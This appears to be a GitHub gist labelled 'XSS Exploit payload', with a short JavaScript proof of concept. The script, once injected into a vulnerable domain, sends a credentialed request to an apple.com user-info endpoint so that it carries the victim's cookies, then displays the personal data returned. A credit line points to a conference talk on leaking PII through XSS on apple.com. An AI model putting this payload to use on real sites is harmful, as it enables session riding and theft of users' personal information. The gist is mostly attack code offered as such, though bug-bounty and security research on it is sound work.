Skip to content

Instantly share code, notes, and snippets.

@cyb3rsalih
Created May 31, 2022 09:04
Show Gist options
  • Save cyb3rsalih/027963af17b918181c6d03c7ec289024 to your computer and use it in GitHub Desktop.
Save cyb3rsalih/027963af17b918181c6d03c7ec289024 to your computer and use it in GitHub Desktop.
XSS Exploit payload
// The code executed on vulnerable domain, to make request which have sensitive information.
function resp(){
alert(this.responseText);
}
var xhttp = new XMLHttpRequest();
xhttp.addEventListener("load",resp);
xhttp.open("GET","https://apple.com/user/info");
xhttp.withCredentials = true; // this will add cookie to request
xhttp.send();
/* Thanks https://youtu.be/fcAklNSta-U?t=1031
#NahamCon2022 - @zseano Finding XSS on .apple.com and building a proof of concept to leak your PII
*/
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment